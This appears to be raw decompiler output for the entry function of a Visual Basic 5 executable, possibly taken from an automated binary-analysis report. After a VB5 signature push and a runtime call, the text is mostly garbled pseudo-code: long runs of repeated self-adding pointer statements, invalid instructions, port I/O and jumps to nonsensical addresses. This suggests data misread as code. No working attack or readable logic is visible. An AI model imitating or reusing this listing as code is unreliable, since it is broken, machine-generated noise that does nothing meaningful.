                                                                        			_entry_(signed int __eax, signed int __ecx, signed int __edx, signed int __esi, intOrPtr _a43, intOrPtr _a51, intOrPtr _a55, signed int _a59, char _a64, intOrPtr _a66, signed int _a71, intOrPtr _a102, signed int _a109, char _a110, signed int _a114, intOrPtr _a65659, char _a735838272, signed int _a1092878454) {
                                                                        				char _v1;
                                                                        				intOrPtr _v1744814033;
                                                                        				intOrPtr* _t845;
                                                                        				signed char _t846;
                                                                        				signed char _t847;
                                                                        				void* _t848;
                                                                        				intOrPtr* _t849;
                                                                        				signed int _t850;
                                                                        				signed int _t851;
                                                                        				signed char _t852;
                                                                        				signed int _t853;
                                                                        				signed int _t855;
                                                                        				intOrPtr* _t859;
                                                                        				signed int _t860;
                                                                        				intOrPtr* _t871;
                                                                        				signed int _t872;
                                                                        				intOrPtr* _t873;
                                                                        				intOrPtr* _t874;
                                                                        				intOrPtr* _t875;
                                                                        				intOrPtr* _t876;
                                                                        				void* _t877;
                                                                        				intOrPtr* _t879;
                                                                        				intOrPtr* _t880;
                                                                        				intOrPtr* _t881;
                                                                        				intOrPtr* _t882;
                                                                        				intOrPtr* _t883;
                                                                        				intOrPtr* _t884;
                                                                        				intOrPtr* _t885;
                                                                        				intOrPtr* _t886;
                                                                        				intOrPtr* _t887;
                                                                        				intOrPtr* _t888;
                                                                        				intOrPtr* _t891;
                                                                        				intOrPtr* _t892;
                                                                        				intOrPtr* _t893;
                                                                        				intOrPtr* _t894;
                                                                        				intOrPtr* _t895;
                                                                        				intOrPtr* _t896;
                                                                        				signed char _t897;
                                                                        				intOrPtr* _t900;
                                                                        				intOrPtr* _t901;
                                                                        				signed int _t904;
                                                                        				intOrPtr* _t905;
                                                                        				signed char _t906;
                                                                        				void* _t907;
                                                                        				signed int _t909;
                                                                        				signed int _t910;
                                                                        				signed char _t912;
                                                                        				intOrPtr* _t915;
                                                                        				intOrPtr* _t916;
                                                                        				intOrPtr* _t917;
                                                                        				intOrPtr* _t918;
                                                                        				intOrPtr* _t919;
                                                                        				intOrPtr* _t920;
                                                                        				signed int _t921;
                                                                        				intOrPtr* _t922;
                                                                        				intOrPtr* _t923;
                                                                        				intOrPtr* _t924;
                                                                        				intOrPtr* _t925;
                                                                        				intOrPtr* _t927;
                                                                        				signed int _t928;
                                                                        				intOrPtr* _t929;
                                                                        				intOrPtr* _t930;
                                                                        				intOrPtr* _t931;
                                                                        				void* _t932;
                                                                        				intOrPtr* _t934;
                                                                        				intOrPtr* _t935;
                                                                        				intOrPtr* _t936;
                                                                        				intOrPtr* _t937;
                                                                        				intOrPtr* _t938;
                                                                        				intOrPtr* _t939;
                                                                        				intOrPtr* _t940;
                                                                        				intOrPtr* _t941;
                                                                        				intOrPtr* _t942;
                                                                        				intOrPtr* _t943;
                                                                        				intOrPtr* _t944;
                                                                        				intOrPtr* _t945;
                                                                        				intOrPtr* _t949;
                                                                        				intOrPtr* _t950;
                                                                        				intOrPtr* _t951;
                                                                        				void* _t952;
                                                                        				intOrPtr* _t954;
                                                                        				intOrPtr* _t955;
                                                                        				intOrPtr* _t956;
                                                                        				intOrPtr* _t957;
                                                                        				intOrPtr* _t958;
                                                                        				intOrPtr* _t959;
                                                                        				intOrPtr* _t960;
                                                                        				intOrPtr* _t961;
                                                                        				void* _t962;
                                                                        				intOrPtr* _t964;
                                                                        				intOrPtr* _t965;
                                                                        				intOrPtr* _t966;
                                                                        				intOrPtr* _t967;
                                                                        				intOrPtr* _t968;
                                                                        				intOrPtr* _t970;
                                                                        				intOrPtr* _t972;
                                                                        				intOrPtr* _t974;
                                                                        				intOrPtr* _t976;
                                                                        				signed char _t978;
                                                                        				intOrPtr* _t979;
                                                                        				intOrPtr* _t980;
                                                                        				signed char _t982;
                                                                        				intOrPtr* _t983;
                                                                        				void* _t984;
                                                                        				intOrPtr* _t986;
                                                                        				intOrPtr* _t987;
                                                                        				signed int _t988;
                                                                        				signed char _t989;
                                                                        				intOrPtr* _t990;
                                                                        				signed int _t991;
                                                                        				intOrPtr* _t995;
                                                                        				signed char _t996;
                                                                        				intOrPtr* _t997;
                                                                        				intOrPtr* _t998;
                                                                        				signed int _t999;
                                                                        				intOrPtr* _t1000;
                                                                        				signed int _t1001;
                                                                        				signed int _t1003;
                                                                        				intOrPtr* _t1004;
                                                                        				signed char _t1005;
                                                                        				void* _t1007;
                                                                        				intOrPtr* _t1009;
                                                                        				intOrPtr* _t1010;
                                                                        				intOrPtr* _t1011;
                                                                        				signed char _t1013;
                                                                        				intOrPtr* _t1016;
                                                                        				intOrPtr* _t1017;
                                                                        				signed int _t1018;
                                                                        				signed int _t1019;
                                                                        				signed char _t1020;
                                                                        				signed int _t1040;
                                                                        				signed int _t1041;
                                                                        				signed int _t1042;
                                                                        				intOrPtr* _t1044;
                                                                        				intOrPtr* _t1045;
                                                                        				signed char _t1046;
                                                                        				intOrPtr* _t1059;
                                                                        				intOrPtr* _t1060;
                                                                        				intOrPtr* _t1061;
                                                                        				intOrPtr* _t1062;
                                                                        				intOrPtr* _t1063;
                                                                        				intOrPtr* _t1067;
                                                                        				intOrPtr* _t1068;
                                                                        				signed char _t1069;
                                                                        				intOrPtr* _t1073;
                                                                        				intOrPtr* _t1074;
                                                                        				intOrPtr* _t1075;
                                                                        				signed int _t1077;
                                                                        				intOrPtr* _t1078;
                                                                        				intOrPtr* _t1079;
                                                                        				signed char _t1080;
                                                                        				signed char _t1081;
                                                                        				signed int _t1083;
                                                                        				signed int _t1084;
                                                                        				intOrPtr* _t1085;
                                                                        				intOrPtr* _t1086;
                                                                        				void* _t1087;
                                                                        				intOrPtr* _t1089;
                                                                        				intOrPtr* _t1090;
                                                                        				signed char _t1091;
                                                                        				intOrPtr* _t1092;
                                                                        				intOrPtr* _t1093;
                                                                        				intOrPtr* _t1094;
                                                                        				intOrPtr* _t1095;
                                                                        				signed char _t1096;
                                                                        				intOrPtr* _t1098;
                                                                        				intOrPtr* _t1100;
                                                                        				intOrPtr* _t1102;
                                                                        				intOrPtr* _t1106;
                                                                        				intOrPtr* _t1108;
                                                                        				intOrPtr* _t1109;
                                                                        				intOrPtr* _t1112;
                                                                        				intOrPtr* _t1113;
                                                                        				intOrPtr* _t1115;
                                                                        				intOrPtr* _t1116;
                                                                        				void* _t1117;
                                                                        				intOrPtr* _t1119;
                                                                        				void* _t1120;
                                                                        				intOrPtr* _t1122;
                                                                        				intOrPtr* _t1126;
                                                                        				void* _t1127;
                                                                        				intOrPtr* _t1129;
                                                                        				void* _t1130;
                                                                        				intOrPtr* _t1132;
                                                                        				intOrPtr* _t1136;
                                                                        				signed int _t1138;
                                                                        				intOrPtr* _t1143;
                                                                        				intOrPtr* _t1144;
                                                                        				intOrPtr* _t1149;
                                                                        				intOrPtr* _t1150;
                                                                        				intOrPtr* _t1151;
                                                                        				intOrPtr* _t1152;
                                                                        				intOrPtr* _t1153;
                                                                        				signed char _t1155;
                                                                        				intOrPtr* _t1157;
                                                                        				void* _t1160;
                                                                        				intOrPtr* _t1165;
                                                                        				intOrPtr* _t1166;
                                                                        				intOrPtr* _t1167;
                                                                        				intOrPtr* _t1168;
                                                                        				intOrPtr* _t1169;
                                                                        				intOrPtr* _t1171;
                                                                        				signed char _t1183;
                                                                        				signed char _t1184;
                                                                        				signed int _t1186;
                                                                        				void* _t1187;
                                                                        				intOrPtr* _t1192;
                                                                        				void* _t1193;
                                                                        				void* _t1194;
                                                                        				void* _t1195;
                                                                        				void* _t1196;
                                                                        				void* _t1197;
                                                                        				void* _t1198;
                                                                        				void* _t1200;
                                                                        				void* _t1201;
                                                                        				void* _t1206;
                                                                        				signed char* _t1207;
                                                                        				intOrPtr* _t1213;
                                                                        				intOrPtr* _t1214;
                                                                        				signed int* _t1218;
                                                                        				signed int _t1219;
                                                                        				signed int* _t1220;
                                                                        				intOrPtr* _t1221;
                                                                        				signed char _t1227;
                                                                        				void* _t1228;
                                                                        				void* _t1229;
                                                                        				void* _t1230;
                                                                        				signed int* _t1231;
                                                                        				void* _t1232;
                                                                        				signed char _t1233;
                                                                        				void* _t1234;
                                                                        				void* _t1235;
                                                                        				void* _t1236;
                                                                        				intOrPtr* _t1237;
                                                                        				void* _t1238;
                                                                        				void* _t1240;
                                                                        				void* _t1241;
                                                                        				void* _t1242;
                                                                        				void* _t1243;
                                                                        				void* _t1244;
                                                                        				intOrPtr* _t1245;
                                                                        				void* _t1246;
                                                                        				void* _t1247;
                                                                        				void* _t1248;
                                                                        				void* _t1249;
                                                                        				intOrPtr* _t1250;
                                                                        				void* _t1251;
                                                                        				void* _t1252;
                                                                        				signed int* _t1253;
                                                                        				signed int* _t1254;
                                                                        				signed int* _t1255;
                                                                        				intOrPtr* _t1256;
                                                                        				void* _t1257;
                                                                        				signed int _t1258;
                                                                        				void* _t1259;
                                                                        				void* _t1260;
                                                                        				intOrPtr* _t1262;
                                                                        				void* _t1263;
                                                                        				void* _t1264;
                                                                        				signed int* _t1266;
                                                                        				signed int* _t1267;
                                                                        				signed int* _t1268;
                                                                        				intOrPtr* _t1269;
                                                                        				signed int* _t1270;
                                                                        				signed int _t1276;
                                                                        				signed int _t1277;
                                                                        				intOrPtr* _t1278;
                                                                        				signed int _t1280;
                                                                        				char* _t1281;
                                                                        				void* _t1285;
                                                                        				signed int _t1286;
                                                                        				intOrPtr* _t1287;
                                                                        				intOrPtr* _t1288;
                                                                        				intOrPtr* _t1289;
                                                                        				void* _t1290;
                                                                        				signed char _t1291;
                                                                        				intOrPtr* _t1292;
                                                                        				intOrPtr* _t1293;
                                                                        				intOrPtr* _t1294;
                                                                        				intOrPtr* _t1295;
                                                                        				intOrPtr* _t1296;
                                                                        				intOrPtr* _t1297;
                                                                        				signed char _t1298;
                                                                        				signed int _t1300;
                                                                        				signed char _t1305;
                                                                        				intOrPtr* _t1306;
                                                                        				void* _t1309;
                                                                        				intOrPtr _t1310;
                                                                        				intOrPtr _t1317;
                                                                        				intOrPtr _t1318;
                                                                        				intOrPtr _t1322;
                                                                        				intOrPtr _t1323;
                                                                        				intOrPtr _t1429;
                                                                        				intOrPtr _t1449;
                                                                        
                                                                        				_t1276 = __esi;
                                                                        				_push("VB5!6&*"); // executed
                                                                        				L00401182(); // executed
                                                                        				 *__eax =  *__eax + __eax;
                                                                        				 *__eax =  *__eax + __eax;
                                                                        				 *__eax =  *__eax + __eax;
                                                                        				 *__eax =  *__eax ^ __eax;
                                                                        				 *__eax =  *__eax + __eax;
                                                                        				_t845 = __eax + 1;
                                                                        				 *_t845 =  *_t845 + _t845;
                                                                        				 *_t845 =  *_t845 + _t845;
                                                                        				 *_t845 =  *_t845 + _t845;
                                                                        				 *((intOrPtr*)(_t1285 + __ecx * 8)) =  *((intOrPtr*)(_t1285 + __ecx * 8)) + _t845;
                                                                        				_t846 = _t845 + 0xcc;
                                                                        				_t1227 = __edx & __ecx;
                                                                        				asm("in al, 0xc4");
                                                                        				asm("fisttp word [eax-0x7c]");
                                                                        				_t1218 = __ecx + _t1280;
                                                                        				asm("adc [ecx+0x9], edx");
                                                                        				 *_t846 =  *_t846 + _t846;
                                                                        				 *_t1218 =  *_t1218 + _t846;
                                                                        				 *_t846 =  *_t846 + _t846;
                                                                        				 *_t846 =  *_t846 + _t846;
                                                                        				 *((intOrPtr*)(_t846 + _t846)) =  *((intOrPtr*)(_t846 + _t846)) + _t846;
                                                                        				 *_t846 =  *_t846 + _t846;
                                                                        				_push(_t1184);
                                                                        				if( *_t846 != 0) {
                                                                        					_t1280 =  *(_t1184 + 0x76) * 0x31657261;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 ^ _t846;
                                                                        					asm("adc al, 0x4d");
                                                                        					asm("cmc");
                                                                        					asm("sbb al, 0x16");
                                                                        					 *((intOrPtr*)(_t1184 + 8)) =  *((intOrPtr*)(_t1184 + 8)) - 1;
                                                                        					asm("arpl di, si");
                                                                        					_push(_t1270);
                                                                        					asm("in eax, dx");
                                                                        					asm("lahf");
                                                                        					asm("lodsd");
                                                                        					_t1183 = _t1285 - 1;
                                                                        					asm("stosb");
                                                                        					 *((intOrPtr*)(_t1183 - 0x2d)) =  *((intOrPtr*)(_t1183 - 0x2d)) + _t1183;
                                                                        					_t846 = _t1184 ^  *(_t1218 - 0x48ee309a);
                                                                        					_t1184 = _t1183;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					_t1270 =  *(__esi + 0x3a);
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					 *_t1184 =  *_t1184 + _t846;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        				}
                                                                        				 *_t1218 = _t1218 +  *_t1218;
                                                                        				_t1218[0x1c] = _t1218[0x1c] + _t846;
                                                                        				asm("a16 jnz 0x69");
                                                                        				_t1286 = _a114 * 0x10d0073;
                                                                        				_push(es);
                                                                        				_t19 = _t846 + 0x65;
                                                                        				 *_t19 =  *((intOrPtr*)(_t846 + 0x65)) + _t1218;
                                                                        				_t1317 =  *_t19;
                                                                        				if(_t1317 < 0) {
                                                                        					L11:
                                                                        					if (_t1322 >= 0) goto L12;
                                                                        					 *_t846 =  *_t846 ^ _t846;
                                                                        					asm("adc eax, [eax]");
                                                                        					 *_t1276 =  *_t1276 + _t1227;
                                                                        					 *_t1270 =  *_t1270 + _t1227;
                                                                        					 *_t846 =  *_t846 + _t1184;
                                                                        					 *_t846 =  *_t846 + _t846;
                                                                        					asm("sbb [edi], ecx");
                                                                        					_t38 =  &_a110;
                                                                        					 *_t38 = _a110 + _t1227;
                                                                        					_t1323 =  *_t38;
                                                                        					goto L13;
                                                                        				} else {
                                                                        					if(_t1317 >= 0) {
                                                                        						L8:
                                                                        						_t1218 =  &(_t1218[0]);
                                                                        						asm("outsb");
                                                                        						if(_t1218 == 0) {
                                                                        							goto L15;
                                                                        						} else {
                                                                        							asm("insb");
                                                                        							asm("popad");
                                                                        							asm("bound ebp, [ecx+0x75]");
                                                                        							asm("insd");
                                                                        							 *0x3113ea02 =  *0x3113ea02 + _t846;
                                                                        							 *(_t1276 + 0xc) =  *(_t1276 + 0xc) | _t1286;
                                                                        							goto L10;
                                                                        						}
                                                                        					} else {
                                                                        						 *_t1218 =  *_t1218 + _t1184;
                                                                        						 *_t846 =  *_t846 + _t846;
                                                                        						_t1227 = _t1227 + 1;
                                                                        						 *_t1227 =  *_t1227 + _t846;
                                                                        						_t1286 = _t1286 +  *((intOrPtr*)(_t1276 + _t846));
                                                                        						_t22 = _t846 + 0x65;
                                                                        						 *_t22 =  *((intOrPtr*)(_t846 + 0x65)) + _t1218;
                                                                        						_t1318 =  *_t22;
                                                                        						if(_t1318 < 0) {
                                                                        							L13:
                                                                        							_push(_t1280);
                                                                        							asm("outsb");
                                                                        							if(_t1323 < 0) {
                                                                        								L18:
                                                                        								 *_t846 =  *_t846 + _t846;
                                                                        								 *_t1184 =  *_t1184 + 1;
                                                                        								_t847 = _t846;
                                                                        								 *_t847 =  *_t847 + _t847;
                                                                        								_t848 = _t847 + 0xc;
                                                                        								_t50 = _t1184 + 0x6c;
                                                                        								 *_t50 =  *((intOrPtr*)(_t1184 + 0x6c)) + _t1227;
                                                                        								asm("a16 jz 0x76");
                                                                        								asm("bound ebp, [edi+0x67]");
                                                                        								asm("gs outsb");
                                                                        								if( *_t50 >= 0) {
                                                                        									 *(_t1227 + 0x20b02) =  *(_t1227 + 0x20b02) | _t1184;
                                                                        									 *_t1227 =  *_t1227 + 1;
                                                                        									_t849 = _t848 + 6;
                                                                        									 *_t849 =  *_t849 + _t849;
                                                                        									_t850 = _t849 + _t1184;
                                                                        									goto L27;
                                                                        								} else {
                                                                        									 *_t1227 =  *_t1227 + _t848;
                                                                        									_t852 = _t848 + 0x29;
                                                                        									_t1218 = _t1218 +  *0xef13740c;
                                                                        									asm("adc [ebx], cl");
                                                                        									_push(es);
                                                                        									_t52 = _t1184 + 0x65;
                                                                        									 *_t52 =  *((intOrPtr*)(_t1184 + 0x65)) + _t852;
                                                                        									if ( *_t52 < 0) goto L28;
                                                                        									goto L20;
                                                                        								}
                                                                        							} else {
                                                                        								asm("outsb");
                                                                        								asm("outsb");
                                                                        								_t1280 =  *(_t1276 + 0x67) * 0x31736e65;
                                                                        								 *_t1184 =  *_t1184 + _t1184;
                                                                        								 *_t846 =  *_t846 + _t846;
                                                                        								_t852 = _t846 & 0x2d022c01;
                                                                        								_t1184 = _t1184 + _t1184;
                                                                        								_t1286 = _t1286 +  *_t1227;
                                                                        								 *_t852 =  *_t852 + _t852;
                                                                        								 *_t1227 =  *_t1227 + _t852;
                                                                        								_push(cs);
                                                                        								 *((intOrPtr*)(_t1184 + 0x6f)) =  *((intOrPtr*)(_t1184 + 0x6f)) + _t1218;
                                                                        								asm("insb");
                                                                        								asm("insb");
                                                                        								L15:
                                                                        								asm("popad");
                                                                        								asm("bound ebp, [edi+0x72]");
                                                                        								if(_t1323 < 0) {
                                                                        									L20:
                                                                        									asm("arpl [ebp], bp");
                                                                        								} else {
                                                                        									asm("outsb");
                                                                        									 *[gs:ebx] =  *[gs:ebx] + _t1218;
                                                                        									_pop(es);
                                                                        									goto 0x840130e;
                                                                        									 *_t852 =  *_t852 | _t852;
                                                                        									_t1184 = _t1184 + _t1184;
                                                                        									_t1280 =  &_v1 +  *_t1270;
                                                                        									 *_t852 =  *_t852 + _t852;
                                                                        									 *_t1184 =  *_t1184 + _t852;
                                                                        									_t850 = _t852 |  *_t852;
                                                                        									_push(_t1184);
                                                                        									_t1276 = _a109 * 0x70;
                                                                        									asm("insb");
                                                                        									asm("popad");
                                                                        									if(_t1276 >= 0) {
                                                                        										L27:
                                                                        										 *_t1270 =  *_t1270 + _t850;
                                                                        										 *_t850 =  *_t850 + _t850;
                                                                        										 *_t850 =  *_t850 + _t850;
                                                                        										 *_t1270 =  *_t1270 + _t850;
                                                                        										 *_t850 =  *_t850 + _t850;
                                                                        										_t851 = _t850 + _t1227;
                                                                        										_push(_t1276);
                                                                        										_t1227 = _t1227 + 1;
                                                                        										_t852 = _t851 ^ 0x2a263621;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t1276 =  *_t1276 + _t1184;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t852 =  *_t852 + _t852;
                                                                        										 *_t1227 = _t1218 +  *_t1227;
                                                                        										 *_t1218 = _t1218 +  *_t1218;
                                                                        										_t853 = _t852;
                                                                        										 *_t853 =  *_t853 + _t853;
                                                                        										 *_t853 =  *_t853 + _t853;
                                                                        										 *_t853 =  *_t853 + _t853;
                                                                        										 *_t853 =  *_t853 + _t853;
                                                                        										 *((intOrPtr*)(_t853 + 0x44004029)) =  *((intOrPtr*)(_t853 + 0x44004029)) + _t853;
                                                                        										asm("clc");
                                                                        										 *_t1218 =  *_t1218 ^ _t853;
                                                                        										 *_t853 =  *_t853 + _t1286;
                                                                        										asm("invalid");
                                                                        										 *_t853 =  *_t853 - 1;
                                                                        										 *_t853 =  *_t853 + _t853;
                                                                        										 *_t1218 =  *_t1218 + _t853;
                                                                        										 *_t853 =  *_t853 + _t853;
                                                                        										 *_t1227 =  *_t1227 + _t1227;
                                                                        										 *_t853 =  *_t853 + _t853;
                                                                        									} else {
                                                                        										_push(es);
                                                                        										 *_t1184 =  *_t1184 + _t1218;
                                                                        										_a102 = _a102 + _t1218;
                                                                        										_t1280 =  *(_t1276 + 0x64) * 0x67696c74;
                                                                        										_t846 = _t1227;
                                                                        										_t1227 = (_t850 ^  *_t850) + 0x1251369;
                                                                        										 *(_t1276 + 0x120a) =  *(_t1276 + 0x120a) | _t846;
                                                                        										goto L18;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							if(_t1318 >= 0) {
                                                                        								L10:
                                                                        								asm("o16 or al, 0xaf");
                                                                        								asm("adc dl, [edx]");
                                                                        								asm("lldt word [ebp]");
                                                                        								asm("outsb");
                                                                        								 *((intOrPtr*)(_t846 + _t846 + 0x65)) =  *((intOrPtr*)(_t846 + _t846 + 0x65)) + _t846;
                                                                        								 *_t1227 =  *_t1227 + _t1227;
                                                                        								 *[fs:esi] =  *[fs:esi] + _t1218;
                                                                        								asm("outsb");
                                                                        								 *_t1218 = _t1218 +  *_t1218;
                                                                        								asm("outsb");
                                                                        								 *_t1270 =  *_t1270 + _t846;
                                                                        								 *[gs:esi] =  *[gs:esi] + _t1218;
                                                                        								_t1322 =  *[gs:esi];
                                                                        								goto L11;
                                                                        							} else {
                                                                        								 *0 =  *0 + _t1227;
                                                                        								 *_t846 =  *_t846 + _t846;
                                                                        								 *_t846 =  *_t846 + _t846;
                                                                        								asm("lock or [eax], eax");
                                                                        								 *(_t1218 + _t1218) =  *(_t1218 + _t1218) + _t846;
                                                                        								 *((intOrPtr*)(_t846 + _t846 + 0x46)) =  *((intOrPtr*)(_t846 + _t846 + 0x46)) + _t846;
                                                                        								_t1270 = _t1270 + _t1270;
                                                                        								 *((intOrPtr*)(_t846 + _t846)) =  *((intOrPtr*)(_t846 + _t846)) + _t1286;
                                                                        								 *_t1218 =  *_t1218 + _t846;
                                                                        								_t852 = _t846 |  *_t846;
                                                                        								goto L8;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t1219 = _t1218 + _t1218;
                                                                        				 *_t853 =  *_t853 + _t853;
                                                                        				asm("das");
                                                                        				_t855 = _t853 + _t853 + 1;
                                                                        				_t58 = _t855 - 0x6bffbfed;
                                                                        				 *_t58 =  *((intOrPtr*)(_t855 - 0x6bffbfed)) + _t855;
                                                                        				asm("adc [eax], eax");
                                                                        				if ( *_t58 < 0) goto L32;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855;
                                                                        				 *((intOrPtr*)(_t855 + _t855 + 0x8d0000)) =  *((intOrPtr*)(_t855 + _t855 + 0x8d0000)) + _t1219;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				 *_t855 =  *_t855 + _t855;
                                                                        				_push(_t1286);
                                                                        				asm("outsd");
                                                                        				_push(0x6769646e);
                                                                        				if( *_t855 >= 0) {
                                                                        					L36:
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					_t71 = _t855 + 0x48;
                                                                        					 *_t71 =  *((intOrPtr*)(_t855 + 0x48)) + _t1219;
                                                                        					if ( *_t71 >= 0) goto L37;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					_t855 = _t855 + 1;
                                                                        					 *_t1219 =  *_t1219 + _t855;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *((intOrPtr*)(_t855 + 0x403d)) =  *((intOrPtr*)(_t855 + 0x403d)) + _t1219;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *((intOrPtr*)(_t855 + 0x1004014)) =  *((intOrPtr*)(_t855 + 0x1004014)) + _t1219;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *((intOrPtr*)(_t855 + 0x4014)) =  *((intOrPtr*)(_t855 + 0x4014)) + _t1227;
                                                                        					 *_t855 =  *_t855 + _t855;
                                                                        					 *((intOrPtr*)(_t1286 + _t1227 + 0x10040)) =  *((intOrPtr*)(_t1286 + _t1227 + 0x10040)) + _t1219;
                                                                        					goto L38;
                                                                        				} else {
                                                                        					_t64 = _t1276 + 0x79;
                                                                        					 *_t64 =  *((intOrPtr*)(_t1276 + 0x79)) + _t855;
                                                                        					if( *_t64 < 0) {
                                                                        						L38:
                                                                        						 *_t855 =  *_t855 + _t855;
                                                                        						 *_t855 =  *_t855 + _t855;
                                                                        						_t855 = 0x15;
                                                                        						 *((intOrPtr*)(0x15)) =  *((intOrPtr*)(0x15)) + 0x14;
                                                                        						_t1270[0x1b001a00] = _t1270[0x1b001a00] + _t1227;
                                                                        					} else {
                                                                        						asm("outsb");
                                                                        						asm("a16 jb 0x4");
                                                                        						_t66 = _t1184 + 0x74;
                                                                        						 *_t66 =  *((intOrPtr*)(_t1184 + 0x74)) + _t1227;
                                                                        						if( *_t66 >= 0) {
                                                                        							_t1276 =  *(_t1276 + 0x61) * 0x72;
                                                                        							 *[gs:eax] =  *[gs:eax] ^ _t855;
                                                                        							 *_t855 =  *_t855 + _t855;
                                                                        							asm("pushad");
                                                                        							 *(_t855 +  *_t855 ^ 0x00000040) =  *(_t855 +  *_t855 ^ 0x00000040) + (_t855 +  *_t855 ^ 0x00000040);
                                                                        							asm("invalid");
                                                                        							 *0xff004216 =  *0xff004216 + 1;
                                                                        							 *0xff004216 =  *0xff004216 + 0xff004216;
                                                                        							 *((intOrPtr*)(_t1276 + _t1276)) =  *((intOrPtr*)(_t1276 + _t1276)) + _t1227;
                                                                        							_t855 = 0xffffffffff004217;
                                                                        							 *0xff004216 =  *0xff004216 + _t1227;
                                                                        							 *_t1227 =  *_t1227 & 0xffffffffff004217;
                                                                        							goto L36;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				asm("adc al, 0x40");
                                                                        				 *_t855 =  *_t855 + _t1227;
                                                                        				_t1186 = _t855;
                                                                        				_t1228 = _t1227 + 1;
                                                                        				 *1 =  *1 + 1;
                                                                        				 *1 =  *1 + 1;
                                                                        				_t1270[0x1d] = _t1270[0x1d] + _t1219;
                                                                        				 *0xFFFFFFFFA800403E =  *((intOrPtr*)(0xffffffffa800403e)) + _t1186;
                                                                        				ds = 0xd8006c00;
                                                                        				 *0x00000002 =  *((intOrPtr*)(2)) + _t1228;
                                                                        				 *1 =  *1 + 1;
                                                                        				_t1187 = _t1186 + _t1186;
                                                                        				asm("invalid");
                                                                        				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 1;
                                                                        				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
                                                                        				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
                                                                        				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
                                                                        				_t859 = 2 + _t1187;
                                                                        				asm("adc al, 0x40");
                                                                        				 *_t859 =  *_t859 + _t1228;
                                                                        				_pop(_t1229);
                                                                        				if ( *_t859 >= 0) goto L40;
                                                                        				_t860 = _t1286;
                                                                        				_t1287 = _t859;
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t860 =  *_t860 + _t860;
                                                                        				 *_t860 =  *_t860 + _t860;
                                                                        				 *((intOrPtr*)(0x15)) =  *((intOrPtr*)(0x15)) + _t1229;
                                                                        				asm("adc al, 0x40");
                                                                        				 *0x00000026 =  *((intOrPtr*)(0x26)) + _t1229;
                                                                        				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1229;
                                                                        				 *((intOrPtr*)(_t1219 + _t1229 + 0x40)) =  *((intOrPtr*)(_t1219 + _t1229 + 0x40)) + 1;
                                                                        				 *0x00000017 =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
                                                                        				 *((intOrPtr*)(0x17)) =  *((intOrPtr*)(0x17)) + 0x14;
